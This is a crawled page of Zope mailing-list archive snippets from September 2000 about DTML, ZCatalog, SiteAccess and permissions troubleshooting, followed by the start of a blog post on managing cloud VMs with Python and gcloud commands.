___ [Zope] Error shouldn't be appended :-S Skip Montanaro wrote: Having only recently upgraded from Zope 2.0 to 2.2.1 I see that the default behavior for traceback reporting is still to embed them in an HTML comment (or display them when debugging). Yeah, and in production mode it sticks it after the end of your /html ...which [Zope] Not Patch to let Authorized Exceptions use standard_error_message ;-) Andy [Zope] How to apply arbitrary methods to objects? Hi, I'm trying to create an inline interface to manage_edit. If a user is authenticated, instead of seeing the default views of each snippet of content, they get a textarea with a submit button for each snippet. I'm still new to all this, so I'm not sure how I should be going about it: a [Zope] Help: Zope2 all threads frozen... Hello, I have zope2.2 with whats look like all thread frozen(on linux, using zserver). Netstat reports a lot of connections ESTABLISHED or CLOSE_WAIT to the zope port. Of course zope is not responding. Who to solve this (of course I can kill+restart), is it possible to set a connection timeout [Zope] Fulltext Searching? Newbies Problems with ZCatalog... Hi, well, I have added a ZCatalog and ZSearch Interface, searching for id,title etc. works perfect, but - how can I do fulltext-searches with ZCatalog? MfG / best regards, Peer Dicken IMD GmbH Softwareentwicklung Unternehmensberatung Edisonstr. 1 59199 Bönen Tel.: +49 23 83 - [Zope] Guess Who . . . . . . has a opening posted on their Web Site for a C/C++ programmer with Zope / Python experience? Email Software Engineer (CA-K23137) Category: Software Location: CA Division: Other Divisions Work as a part of a small team Re: [Zope] What options exist for dealing with tracebacks? John Although Didier Georgieff has given a thorough reply, I couldn't John resist a quick plug... ;-) John John which has info on using and customising error pages, including John e-mailing of errors. Thanks, [Zope] Why no full Zope? Skip Montanaro wrote: Thanks, interesting, but in my case, probably not immediately useful. It slipped my mind when posting that I need to qualify all my zope posts with, "I'm not using full-blown Zope. I only use ZServer + DocumentTemplates." Still, knowing that there is some mechanism for [Zope] ImportExportFavorites Hi guys i've got a small prob. I have the ImportExportFavorites util from microsoft. If that util post the bookmarks of an user then it sends with http_user_agent "FAVORITES" and file name "img.fav" Is there a way that zope get this file so I can save it in the ZODB. The source for [Zope] Help - Weird stuff. Hi all, Sorry for the subject but I don't really know how to describe this. I have a folder 'hp' which has loads of stuff in it, if I try to copy and paste into it though I get this error: 'The object index_html does not support this operation ' with this traceback: Traceback (innermost [Zope] ZWiki RecentChanges don't work in Zope 2.2.x ...you [Zope] personal portal and Palm syncronization I was building a personal site to weblog my engineering and personal stuff (based on Squishdot and Event Folder), and the thought occurred to me that it would be really neat if I could syncronize my Palm to this personal site. Using the Event Folder, I have a calendar, Squishdot provides the [Zope] Re: Why no full Zope? Chris Why not just use all of Zope and be done with it? That's *much* easier said than done as far as I can tell. I am maintaining long-lived web site ( five years old), which is a mixture of flat html files, CGI scripts, ZServer-published methods and XML-RPC. On the middle end, we use an [Zope] WorldPilot has the bits... [EMAIL PROTECTED] wrote: Any ideas how the sync would be done? WorldPilot has the ability to do this, allegedly. Might be a good starting point... cheers, Chris ___ Zope maillist - [EMAIL PROTECTED] Re: [Zope] ZWiki RecentChanges don't work in Zope 2.2.x On Mon, Sep 25, 2000 at 04:14:03PM +0100, Chris Withers wrote: ...you get an authorization error :-( This is because this Wiki isn't (and shouldn't) be publicly viewable or editable. So, Anonymous doesn't have 'View' permission on the folder. I've given Anonymous 'Access Contents Re: [Zope] personal portal and Palm syncronization Yes, this has been on my wish list for some time, but there's no way I'm going to get round to it right now... Take a look at pilot-link () for interfaces to the mail, todo, etc software on your palm. This will only really deal with workstation - palm Re: [Zope] Cookie pointer. Since cookies have been brought up, I tried the following code (Using Steve's example): dtml-if expr="RESPONSE.setCookie('name', 'value', path='/', expires=( ZopeTime() + (1.0/102.0) )" "You have cookies enabled" dtml-else "Your browser does not support cookies" /dtml-if The cookie [Zope] Newbie Tree Tag Help I am trying to implement a dtml-tree setup that will read from a set of folders that I have placed a the top level of my portal folder structure. I want to be able to call this method from other branches in the portal and have it always display the tree using the set of folders I have set up [Zope] Re: Can't export only an ObjectManager Yes sorry I mean without (Friday afternoon y'know) A hack is my best bet. Sigh. - Original Message - From: "Chris Withers" [EMAIL PROTECTED] To: "Andy McKay" [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Monday, September 25, 2000 2:42 AM Subject: Can't export only an ObjectManager Re: [Zope] ZWiki RecentChanges don't work in Zope 2.2.x what Martijn said (thanks Martijn). Another quick workaround mentioned on ZWikiProblems: you could remove the calls to getSize and similar attributes from your recentchanges page. Then Access Contents Information should be sufficient. -Simon ___ [Zope] Redirect FTP access on a role basis Is it possible to redirect FTP access to subfolders depending on user's role? If yes, how can I do that? I would like to have connect to the graphics folder "/gfx", if an account with a "Designer role" connects to the server in order to upload/exchange graphics. His account [Zope] still problems w/ SiteAccess 2.0.0b3 Hi, After struggling with Zope 2.2.1 + SiteAccess 2.0.0b3 upgraded from Zope 2.1.6, I gave up: I purged the previous installation and started from scratch. Now I have a strange scenario: SiteAccess is installed and I can see SiteRoot and Set Access Rule in the popup menu but [Zope] RE: Stability problems using ZOracleDA hi, we were suffering from the same problem, but now it works. when you use ZOracleDA, be sure not to use DCOracle, which ships with it. There's a newer version on the Zope site. Use the new one instead and everything will be fine. Our systems admin told me that he also modified either Re: [Zope] Authentication problem when accessing ZSQL method steve smith writes: I am experiencing great frustration when trying to implement a drop-down list based upon one of the how-tos I found on the Zope site. Whenever I try to 'view' the DTML method which references the ZSQL method, I am prompted to authenticate by my browser. I can't see Re: [Zope] Set access rule On Mon, Sep 25, 2000 at 01:52:26PM -0300, Mario Olimpio de Menezes wrote: I did an upgrade last week, from zope 2.1.6 to 2.2.1, using Debian packages. Almost everything was correct, but site access no longer works. Zope 2.2 requires SiteAccess 2 to work. SiteAccess 1 will not Re: [Zope] Nasty subtle security bug - Me Too collector, but posted to the [Zope] Nasty subtle security bug Hi Re: [Zope] Nasty subtle security bug - Me Too Brad Clements wrote: Re: [Zope] Authentication problem when accessing ZSQL method Dieter Maurer wrote: authenticate by my browser. I can't see anything in the security attributes for the SQL method which requires authentication, and I can 'test' the ZSQL method succesfully without requiring authentication. You must grant the "use database methods" to "Annonymous". [Zope] Zope.org FYI Zope.org has been having some problems with memory leaks and "ghosts". Please excuse the occasional interruption. Also, /Members is now a new kind of BTreeFolder. An update to the BTreeFolder product will soon be released. With this change, some DTML installed on zope.org may have problems if Re: [Zope] Nasty subtle security bug - Me Too [Zope] Re: Download Problem Suzette Ramsden wrote: I have had this same problem downloading squishdot zip files and I don't know if it is something I am doing. When I attempt to unzip the file, I keep getting: "error reading header after processing 0 entries" What archiver are you using? I'm guessing you're talking Re: [Zope] multiple ZOPE ... We host zope using mutliple installations of zope. It is better this way because then the clients can control which products they have installed, they can tweak their products without bothering anyone else, they can stop and restart zope whenever they please...the basically have full control. [Zope] displaying based on date Hi everyone, Re: [Zope] Cookie pointer. TMGB wrote: Since cookies have been brought up, I tried the following code (Using Steve's example): I cannot use this code in a GUF/docLogin. I get the error: "Unauthorized You are not authorized to access ZopeTime. " What can I do to this code works? []s -- César A. K. Grossmann [EMAIL RE: [Zope] Cookie pointer. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of Cesar A. K. Grossmann Sent: Monday, September 25, 2000 5:06 PM To: TMGB Cc: Zope@Zope. Org Subject: Re: [Zope] Cookie pointer. TMGB wrote: Since cookies have been brought up, I tried the Re: [Zope] displaying based on date Re: [Zope] Cookie pointer. Steve Drees wrote: What can I do to this code works? Can you cut and paste the offending code? Exactly the same of the message of Thomas: dtml-if expr="RESPONSE.setCookie('name', 'value', path='/', expires=(ZopeTime() + (1.0/102.0))" "You have cookies enabled" dtml-else "Your [Zope] How to automatically document a Zope site? I'm looking for a product, how-to or suggestions on how to document a zope site. Basically I just want to walk the tree of objects and output a nicely formatted series of pages that list the object, type, title, modification time, etc.. Anyone got something ready made? Brad Clements, Re: [Zope] How to automatically document a Zope site? No, although if you take a look at the way SQL Methods generate the dropdown "connection list", you'll get a good understanding of how to walk a tree of objectmanagers... Brad Clements wrote: I'm looking for a product, how-to or suggestions on how to document a zope site. Basically I just [Zope] RedHat site mentions Zope Hello everyone, I just saw on the following: Features for the developer: ... "Popular web application development tools like PHP and Zope" Link: Wow, pretty cool. It is only a five bullet list! I guess Zope is Re: [Zope] How to automatically document a Zope site? Here's what I just whipped up in 5 minutes.. should think before posting I guess. Create Method /Document dtml-var standard_html_header dtml-var "DocumentRecurse(_.None,_,parent=Strader,indent=0)" dtml-var standard_html_footer Strader is the top Folder I want to document Then Create Method Re: [Zope] cannot run without -D on win2000 ? G] Favorites Hi. [Zope-dev] Broadtree Catalog? Chris McDonough wrote: changed on the write. This will be solved by updates to the catalog which use a new "broadtree" BTree implementation. Any idea when this will land? We'ev had to give up on the Catalog for the mailing list archives and go with MySQL's full text indexing :-( cheers, [Zope-dev] How is 'retrieveItem intended to work with TTW Specialists? Hello ZPatterns Folk. I'm trying to implement 'delagation' with a custom Specialist. The idea, (I think this is one of the goals of ZPatterns... to allow delegation of responsibility after the Framework is built...) I have: a) MarketItemManager (Python subclass of Specialist) Some of [Zope-dev] ZCatalog : UTF-8 Chinese HI,) Re: [Zope-dev] ZCatalog : UTF-8 Chinese On Mon, 25 Sep 2000, Sin Hang Kin wrote: I generate the search interface, and test it. However, the search of the index terms return nothings. I search most entries found in the vocubalury but none works, those work will return many unwanted results also. What is causing this failure? What [Zope-dev] questions on ZPatterns plugin code I've started browsing the ZPatterns code, and here are the questions that came up for me while reading PlugsIns.py... Is zope-dev a good place for this? Would somewhere in the ZPatterns wiki be better? The PlugInBase.manage_afterAdd() and manage_beforeDelete() methods dynamically checks if [Zope-dev] RE: [Zope-ZEO] Advice But there are really two ways to do this, either of which is viable. 1. the right way ;-) 2. Code all of your logic using TTW stuff and Zope components. Use the Publisher.Test.test method to call methods of your Zope components in unit tests. Do you really Re: [Zope-dev] RE: [Zope-ZEO] Advice (I took the ZEO mail list out of the loop)... [Agreed. Ill CC zope-dev and I suggest we continue there.] Sorry, I phrased my question ambiguously. I meant, do you think a TTW development approach is viable for applications with a non-trivial amount of logic? Perhaps not. Not yet. [Zope-dev] ZPatterns bug: wrong version.txt ZPatterns ZPatterns-0-4-2a3 version.txt still reads as ZPatterns-0-4-2a2 -- Steve Alexander Software Engineer Cat-Box limited ___ Zope-Dev maillist - [EMAIL PROTECTED] ** No [Zope-dev] Testing Zope applications (was Re: [Zope-ZEO] Advice) Note that this conversation hasn't had anything to do with ZEO for some time, so I'm moving it over to zope-dev. Toby Dickenson wrote: (snip) I think it is really much easier to use ZPublisher/Test (which is also available as Zope.debug: import Zope Zope.debug(url) This provides [Zope-dev] trapping undo Is there any way in python to trap the undo event on a document? -- Robin Becker ___ Zope-Dev maillist - [EMAIL PROTECTED] ** No cross posts or HTML encoding! ** (Related lists - [Zope-dev] Suggestion for better Zope error response Suppose you have a simple form like: html form action="" method="post" City: input name="performers" type="text" Radius: input name="radius:int" type="text" input type="submit" name="submit" value="Search" /form /html and the user] How is 'retrieveItem intended to work with TTW Specialists? At 08:00 AM 9/25/00 -0500, Steve Spicklemire wrote: So my retrieve item gets called. *unfortunately* it gets called without any namespace parameter... so my retrieveItem DTML method has no way to acquire a namespace so that it can delagate to something else! So... here is what I did... I
https://www.mail-archive.com/search?l=zope@zope.org&q=date:20000925
CC-MAIN-2019-09
refinedweb
2,930
64.61
Also, check out our Windows 8 Zone. In part 1 of this series I gave you an overview of MonoGame, an open source cross platform implementation of the XNA namespace and class model and how you could use that to port you existing XNA code to Windows 8. In this article, I will show you how to get your development environment setup to support your porting effort. Note: special thanks for Dean Ellis (dellis1972 ) who posted a video on YouTube outlining this process. I highly recommend that you view Dean’s video as well as follow the steps below. Developer System Requirements Install in this order NOTE: I encountered an installation failure when installing the Visual Studio 2010 Express for Windows Phone tools. The XNA support would fail. Aaron Stebner’s directions to download and install the latest version of Games for Windows fixed the issue. Once that is installed, run the setup for the Visual Studio 2010 Express for Windows Phone and all should go smoothly. You may be wondering, why do I need Visual Studio 2010? There is a feature of XNA called the Content Pipeline, a pre-compiler step in the preparation of graphic and audio assets for use at runtime in XNA. This feature is not yet implemented in MonoGame. Therefore you need Visual Studio 2010 to pre-compile your game assets which you then copy over into your VS2012 project. More on that step in part 3 of this blog series. Git Setup MonoGame is an open source project managed under Git. In order to use it you will need to fork the repository from GitHub and then create a clone in your local environment. To do that you will need an account on GitHub and a Git Client. I like the GitHub for Windows client. It has a nice Metro look and feel. It will get you in the mood to develop for Windows 8 After you install the GitHub Windows Client you will have 2 programs available, GitHub (GUI) and Git Shell. The Git Client is a Metro ‘Styled’ desktop application that provides a GUI interface. Git Shell is a PowerShell based command line interface to Git. We will use Git Shell for our purposes. There are a lot of developers who contribute to MonoGame. The Windows 8 support is being developed by Tom Spillman and James Ford of Sickhead Games as well as several other talented developers. We will be using their MonoGame Fork. In particular we will be using the develop3D branch. That is where the Windows 8 support is being submitted. Note: If you would like to contribute to the Windows8 implementation of MonoGame, contact Tom Spillman (requires codeplex account) git clone CD MonoGame git submodule init git submodule update C:\Users\[you]\Documents\GitHub\MonoGame\ProjectTemplates\VisualStudio11.MonoGame.2.5\VS11MGWindowsMetroTemplate C:\Users\[you]\Documents\Visual Studio 2012\Templates\ProjectTemplates\Visual C# C:\Users\[you]\Documents\GitHub\MonoGame\MonoGame.Framework The file is called: MonoGame.Framework.Windows8.sln Now you are ready to add your XNA graphic assets and code. In part 3 of this blog series I will cover the basic format of an XNA application and my code migration experience. – bob This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)
http://www.codeproject.com/script/Articles/ArticleVersion.aspx?aid=445105&av=687063
CC-MAIN-2015-35
refinedweb
553
64.41
When I am including the jaxp.jar, I get the following error- trouble processing "javax/xml/XMLConstants.class": [2009-05-08 16:53:18 - TestProject] Attempt to include a core VM class in something other than a core library. It is likely that you have attempted to include the core library from a desktop virtual machine into an application, which will most assuredly not work. If you really intend to build a core library -- which is only appropriate as part of creating a full virtual machine binary, as opposed to compiling an application -- then use the "--core-library" option to suppress this error message. If you go ahead and use "--core-library" but are in fact building an application, then please be aware that your build will still fail at some point; you will simply be denied the pleasure of reading this helpful error message. [2009-05-08 16:53:18 - TestProject] 1 error; aborting [2009-05-08 16:53:18 - TestProject] Conversion to Dalvik format failed with error 1 Has anyone faced this problem? Any help will be really appreciated I have gone with some solutions but they are not specific. the error you get from Dx is based only on the java package names of the libs you are importing and nothing else. the message can by summarized as: if you import a library in the java.* or javax.* namespace, it’s very likely that it depends on other “core” libraries that are only provided as part of the JDK, and therefore won’t be available in the Android platform. it’s essentially preventing you from doing something stupid, which is accurate 99% of the time when you see that message. now, of course, just because a java package starts with java.* or javax.* does not necessarily mean that it depends on the JDK proper. it may work perfectly fine in android. to get around the stupidity check, add the –core-library option to dx. change the last line of $ANDROID_HOME/platform-tools/dx from, exec java $javaOpts -jar "$jarpath" "$@" to, exec java $javaOpts -jar "$jarpath" --core-library "$@" in my case, i was including a library that depended on Jackson, which depends on JAXB. for me, overriding the stupidity check was acceptable because the library’s use of Jackson was only for JSON and not for XML serialization (i only include the JAXB API library, not the impl). of course i wish there was a cleaner way to go about this, but re-writing the top level library to avoid using Jackson was not an option. ### I see two possibilities: In your project’s folder, the file .classpath could be wrong. Try to replace it with: <> If it does not work, it means the library you are trying to include is not compatible with Android. ### If you are including a core class then this error is self explanatory. If you aren’t (search your code, just to make sure) then I have seen this error from time to time only when using Eclipse when the Android “library” gets added to the Eclipse build path multiple times on accident. I don’t know how it gets in that state, but it has happened to me twice now. To resolve it, you need to fix the .classpath file as Nicolas noted. Another way to do that is to edit the “Java Build Path” (right click on the project and select properties) and remove your Android* libraries (if there are more than one remove them all). This will cause the project to fail to compile and have many errors, but, once you are sure you have gotten rid of all the libraries you can then right click the project again and select “Android Tools”->”Fix Project Properties” and the correct (single copy) of Android.jar will be added back and things should work fine again from there. ### I got this after copy-pasting an Android project into the same workspace. Deleting it from disk afterwards wasn’t enough, cause Eclipse still hade some reference to it hidden away. I also had to remove the following folder under the workspace folder: .metadata\.plugins\org.eclipse.core.resources.projects[NameOfTheDuplicateProject] ### I’m not including a core class or building a core library or any of that. yes, you are: trouble processing “javax/xml/XMLConstants.class” java.* and javax.* both count. you can use the –core-library switch if you just want to ignore this in a test app, but heed the warning: “your application will still fail to build or run, at some point. Please be prepared for angry customers who find, for example, that your application ceases to function once they upgrade their operating system. You will be to blame for this problem.” the right fix, as it says, for a shipping app, is to repackage those classes (i.e. move them to a new directory, edit their “package” lines correspondingly, and update the “import” lines in their callers).
https://throwexceptions.com/android-core-library-error-throwexceptions.html
CC-MAIN-2020-29
refinedweb
827
68.6
On Tue, 17 May 2011, Ingo Molnar wrote: > I'm not sure i get your point. Your example was not complete as described. After an apparently simple specification, you've since added several qualifiers and assumptions, and I still doubt that it's complete. A higher level goal would look like "Allow a sandbox app access only to approved resources, to contain the effects of flaws in the app", or similar. Note that this includes a threat model (remote attacker taking control of the app) and a general and fully stated strategy for dealing with it. From there, you can start to analyze how to implement the goal, at which point you'd start thinking about configuration, assumptions, filesystem access, namespaces, indirect access (e.g. via sockets, rpc, ipc, shared memory, invocation). Anyway, this is getting off track from the main discussion, but you asked... - James -- James Morris <jmorris@namei.org>
http://www.linux-mips.org/archives/linux-mips/2011-05/msg00265.html
CC-MAIN-2015-22
refinedweb
151
63.7
NAOqi Vision - Overview | API | Tutorial See also Namespace : AL #include <alproxies/alfacedetectionproxy.h> Remove all learned faces from the database. Enables/disables the face recognition process. The remaining face detection process will be faster if face recognition is disabled. Face recognition is enabled by default. Enables/disables face tracking. Enabling tracking usually allows you to follow a face even if the corresponding person is not facing the camera anymore. However, it can lead to more false detections. When active, only one face at a time will be detected. Delete from the database all learned faces corresponding to the specified person. Returns whether tracking is enabled. Tracking is enabled by default. Learn a new face and add it in the database under the specified name. Use in a new learning process the latest images where a face has been wrongly recognized. In details, when a face is recognized a serie of few images before and after the recognition are kept in memory in a rolling buffer for 7 seconds. If this method is called, these images are going to feed the learning stage in order to associate the correct name to this face. Note if two different persons are recognized in less than 7 seconds, only the first one can be relearned. Raised when one or several faces are currently being detected.
http://doc.aldebaran.com/1-14/naoqi/vision/alfacedetection-api.html
CC-MAIN-2019-13
refinedweb
221
67.65
[UNIX] Linux Kernel binfmt_elf ELF Loader Privilege Escalation From: SecuriTeam (support_at_securiteam.com) Date: 11/16/04 - Previous message: SecuriTeam: "[NT] Army Men RTS Format String" - Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ] To: list@securiteam.com Date: 16 Nov 2004 17:31 binfmt_elf ELF Loader Privilege Escalation ------------------------------------------------------------------------ SUMMARY Numerous bugs have been found in the Linux ELF binary loader while handling setuid binaries. The vulnerabilities allow a malicious user the ability to exploit SUID binaries in order to gain root privileges on the system. DETAILS Vulnerable Systems: * Linux kernel versions 2.4 up to 2.4.27, inclusive * Linux kernel versions 2.6 up to 2.6.9, inclusive On Unix like systems the execve(2) system call provides functionality to replace the current process by a new one (usually found in binary form on the disk), or in other words to execute a new program. Internally the Linux kernel uses a binary format loader layer to implement the low level format functionality of the execve() system call. The common execve code contains just a few helper functions used to load the new binary and leaves the format specific processing to a specialized binary format loader. One of the Linux format loaders is the ELF (Executable and Linkable Format) loader. Nowadays ELF is the standard format for Linux binaries besides the a.out binary format, which is deprecated. One of the functions of a binary format loader is to properly handle setuid executables, that is - executables with the setuid bit set on the file system image of the executable. It allows execution of programs under a different user ID than the user issuing the execve call. Every ELF binary contains an ELF header defining the type and the layout of the program in memory as well as additional sections (i.e: which program interpreter to load, symbol table, etc). The ELF header normally contains information about the entry point of the binary and the position of the memory map header (phdr) in the binary image and the program interpreter (normally the dynamic linker ld-linux.so). The memory map header defines the memory mapping of the executable file that can be seen later from /proc/self/maps. Five different coding errors have been found in the linux/fs/binfmt_elf.c file, all lines taken from the 2.4.27 kernel source files: * Wrong return value check while filling kernel buffers (loop to scan the binary header for an interpreter section): static int load_elf_binary(struct linux_binprm * bprm, struct pt_regs * regs) { size = elf_ex.e_phnum * sizeof(struct elf_phdr); elf_phdata = (struct elf_phdr *) kmalloc(size, GFP_KERNEL); if (!elf_phdata) goto out; 477: retval = kernel_read(bprm->file, elf_ex.e_phoff, (char *) elf_phdata, size); if (retval < 0) goto out_free_ph; The code presented above looks harmless enough. However, checking the return value of kernel_read (which calls file->f_op->read) to be non-negative is not sufficient since a read() can perfectly return less than the requested buffer size bytes. The bug is present in lines 301, 523 and 545 as well. * Incorrect error behavior, if the mmap() call fails (loop to mmap binary sections into memory): 645: for(i = 0, elf_ppnt = elf_phdata; i < elf_ex.e_phnum; i++, elf_ppnt++) { 684: error = elf_map(bprm->file, load_bias + vaddr, elf_ppnt, elf_prot, elf_flags); if (BAD_ADDR(error)) continue; * Bad return value mishandling while mapping the program intrepreter into memory: 301: retval = kernel_read(interpreter,interp_elf_ex->e_phoff,(char *)elf_phdata,size); error = retval; if (retval < 0) goto out_close; eppnt = elf_phdata; for (i=0; i<interp_elf_ex->e_phnum; i++, eppnt++) { map_addr = elf_map(interpreter, load_addr + vaddr, eppnt, elf_prot, elf_type); 322: if (BAD_ADDR(map_addr)) goto out_close; out_close: kfree(elf_phdata); out: return error; } * The loaded interpreter section can contain an interpreter name string without the terminating NULL: 508: for (i = 0; i < elf_ex.e_phnum; i++) { 518: elf_interpreter = (char *) kmalloc(elf_ppnt->p_filesz, GFP_KERNEL); if (!elf_interpreter) goto out_free_file; retval = kernel_read(bprm->file, elf_ppnt->p_offset, elf_interpreter, elf_ppnt->p_filesz); if (retval < 0) goto out_free_interp; * A bug exists in the common execve() code in exec.c: A vulnerability in open_exec() permits); Analysis * The Linux man pages state that a read(2) can return less than the requested number of bytes, even zero. It is not clear how this can happen while reading a disk file (in contrast to network sockets), however here are some thoughts: * Tricking read to fill the elf_phdata buffer with less than size bytes would cause the remaining part of the buffer to contain some garbage data, that is data from the previous kernel object which occupied that memory area. Therefore we could arbitrarily modify the memory layout of the binary supplying a suitable header information in the kernel buffer. This should be sufficient to gain control over the flow of execution for most of the setuid binaries around. * On Linux a disk read goes through the page cache. That is, a disk read can easily fail on a page boundary due to a low memory condition. In this case read() will return less than the requested number of bytes but still indicate success (return value > 0). * Most of the standard setuid binaries on a 'normal' i386 Linux installation have ELF headers stored below the 4096th byte, therefore they are probably not exploitable on the i386 architecture. * This bug can lead to an incorrectly mmaped binary image in the memory. There are various reasons why a mmap() call can fail: * A temporary low memory condition, so that the allocation of a new VMA descriptor fails. * Memory limit (RLIMIT_AS) excedeed, which can be easily manpipulated before calling execve(). * File locks held for the binary file in question. Security implications in the case of a setuid binary are quite obvious: We may end up with a binary without the .text or .bss section or with those sections shifted (in the case they are not 'fixed' sections). It is not clear which standard binaries are exploitable however it is sufficient that at some point we come over some instructions that jump into the environment area due to malformed memory layout and gain full control over the setuid application. * This bug is similar to the previous one except the code incorrectly returns the kernel_read status to the calling function on mmap failure which will assume that the program interpreter has been loaded. That means the kernel will start the execution of the binary file itself instead of calling the program interpreter (linker) that has to finish the binary It has been found that standard Linux (i386, GCC 2.95) setuid binaries contain code that will jump to the EIP=0 address and crash (since there is no virtual memory mapped there), however this may vary from binary to binary as well from architecture to architecture and may be easily exploitable. * This bug leads to internal kernel file system functions beeing called with an argument string exceeding the maximum path size in length (PATH_MAX). It is not clear if this condition is exploitable. A user may try to execute such a malicious binary with an unterminated interpreter name string and trick the kernel memory manager to return a memory chunk for the elf_interpreter variable followed by a suitable long path name (like ./././....). Experiments show that it can lead to a perceivable system hang. * This bug is similar to the shared file table race [1]. A proof of concept code is listed at the end of this article that just core dumps the non-readable but executable ELF file. A user may create a manipulated ELF binary that requests a non-readable but executable file as program interpreter and gain read access to the privileged binary. This works only if the file is a valid ELF image file so it is not possible to read a data file that has the execute bit set but the read bit cleared. A common usage would be to read exec-only setuid binaries to gain offsets for further exploitation. Proof Of Concept /* * * binfmt_elf executable file read vulnerability * * gcc -O3 -fomit-frame-pointer elfdump.c -o elfdump * * * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <sys/types.h> #include <sys/resource.h> #include <sys/wait.h> #include <linux/elf.h> #define BADNAME "/tmp/_elf_dump" void usage(char *s) { printf("\nUsage: %s executable\n\n", s); exit(0); } // ugly mem scan code :-) static volatile void bad_code(void) { __asm__( // "1: jmp 1b \n" " xorl %edi, %edi \n" " movl %esp, %esi \n" " xorl %edx, %edx \n" " xorl %ebp, %ebp \n" " call get_addr \n" " movl %esi, %esp \n" " movl %edi, %ebp \n" " jmp inst_sig \n" "get_addr: popl %ecx \n" // sighand "inst_sig: xorl %eax, %eax \n" " movl $11, %ebx \n" " movb $48, %al \n" " int $0x80 \n" "ld_page: movl %ebp, %eax \n" " subl %edx, %eax \n" " cmpl $0x1000, %eax \n" " jle ld_page2 \n" // mprotect " pusha \n" " movl %edx, %ebx \n" " addl $0x1000, %ebx \n" " movl %eax, %ecx \n" " xorl %eax, %eax \n" " movb $125, %al \n" " movl $7, %edx \n" " int $0x80 \n" " popa \n" "ld_page2: addl $0x1000, %edi \n" " cmpl $0xc0000000, %edi \n" " je dump \n" " movl %ebp, %edx \n" " movl (%edi), %eax \n" " jmp ld_page \n" "dump: xorl %eax, %eax \n" " xorl %ecx, %ecx \n" " movl $11, %ebx \n" " movb $48, %al \n" " int $0x80 \n" " movl $0xdeadbeef, %eax \n" " jmp *(%eax) \n" ); } static volatile void bad_code_end(void) { } int main(int ac, char **av) { struct elfhdr eh; struct elf_phdr eph; struct rlimit rl; int fd, nl, pid; if(ac<2) usage(av[0]); // make bad a.out fd=open(BADNAME, O_RDWR|O_CREAT|O_TRUNC, 0755); nl = strlen(av[1])+1; memset(&eh, 0, sizeof(eh) ); // elf exec header memcpy(eh.e_ident, ELFMAG, SELFMAG); eh.e_type = ET_EXEC; eh.e_machine = EM_386; eh.e_phentsize = sizeof(struct elf_phdr); eh.e_phnum = 2; eh.e_phoff = sizeof(eh); write(fd, &eh, sizeof(eh) ); // section header(s) memset(&eph, 0, sizeof(eph) ); eph.p_type = PT_INTERP; eph.p_offset = sizeof(eh) + 2*sizeof(eph); eph.p_filesz = nl; write(fd, &eph, sizeof(eph) ); memset(&eph, 0, sizeof(eph) ); eph.p_type = PT_LOAD; eph.p_offset = 4096; eph.p_filesz = 4096; eph.p_vaddr = 0x0000; eph.p_flags = PF_R|PF_X; write(fd, &eph, sizeof(eph) ); // .interp write(fd, av[1], nl ); // execable code nl = &bad_code_end - &bad_code; lseek(fd, 4096, SEEK_SET); write(fd, &bad_code, 4096); close(fd); // dump the *** rl.rlim_cur = RLIM_INFINITY; rl.rlim_max = RLIM_INFINITY; if( setrlimit(RLIMIT_CORE, &rl) ) perror("\nsetrlimit failed"); fflush(stdout); pid = fork(); if(pid) wait(NULL); else execl(BADNAME, BADNAME, NULL); printf("\ncore dumped!\n\n"); unlink(BADNAME); return 0; } ADDITIONAL INFORMATION The information has been provided by <mailto:ihaquer@isec.pl> Paul Starzetz.] Army Men RTS Format String" - Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ] Relevant Pages - [SECURITY] iSEC advisory about binfmt_elf ... Linux kernel binfmt_elf loader vulnerabilities ... One of the Linux format loaders is the ELF (Executable and Linkable ... and the position of the memory map header in the binary image and ... An user may try to execute such a malicious binary with an unterminated ... (Linux-Kernel) - ... (Bugtraq) - ) - [NEWS] Xbox 360 Hypervisor Privilege Escalation Vulnerability ... Get your security news from a reliable source. ... Xbox 360 Hypervisor Privilege Escalation Vulnerability ... access to memory and provides encryption and decryption services. ... to the syscall dispatcher, as illustrated below. ... (Securiteam)
http://www.derkeiler.com/Mailing-Lists/Securiteam/2004-11/0045.html
crawl-001
refinedweb
1,870
54.22
Managing VMs like a Data Scientist Managing virtual machines (VMs) as a data scientist can be tedious. If you are like me and work in a team that is not fortunate enough to have a data engineer cleaning, prepping and giving you your data on a plate with some garnish on the side, then you have to manage, extract and manipulate files sitting on various VMs. Logging into each of these VM to see if all the necessary files dumped, all the necessary packages installed and all the cron jobs executed on time can be a time consuming, inefficient and downright laborious task. Luckily Python comes to the rescue with a package called paramiko. This posts explains how you can wrap your VMs in a DataFrame and execute the same command on all of them saving the returned output in a Python DataFrame. The code for this post can be found on this git repo. Although this post relates to managing VMs — the underlying hack applied here is to use your current knowledge of DataFrames, with all their great functionalities that we all have come to know and love, and combine Python Classes to abstract and make inefficient tasks more efficient. Background Below is some background for those stumbling onto this post with no clue on any of the topics, feel free to skip the sections you know a lot about as the snippets below give a high-level overview to the reader to ensure the post makes sense as a whole. VMs As I work at a corporate and to avoid disclosing the IPs, I’ve opted to spin up 4 VMs on Google Cloud Platform (GCP), but the methodology for any VM on any domain is the same. If you are using GCP and you have the gcloud sdk installed, spinning up GCP VMs via the command line can be achieved with a one-liner as shown below. gcloud compute instances create vm1 --custom-cpu 1 --custom-memory 1 gcloud compute instances create vm2 --custom-cpu 2 --custom-memory 2 gcloud compute instances create vm3 --custom-cpu 1 --custom-memory 1 gcloud compute instances create vm4 --custom-cpu 2 --custom-memory 2 The above bash commands use the gcloud sdk to spin up 4 VMs named: vm1, vm2, vm3 and vm4 respectively with either 1 vCPU and 1Gb of RAM or 2 vCPUs and 2Gb of RAM. If you log into your GCP console, you’ll see the VMs created, each with their respective public IP address that we’ll be using to ssh into. SSH If you’ve never worked in a shell before, you should give it a bash… For those unfamiliar with what the shell even is, it’s the screen that looks like the matrix that all the techies use at work; I show an example below. Similar to Windows 10 or MacOS, the shell is just another way to interact with hardware and comes preinstalled with a plethora of programs like ls, cp, lscpu, top 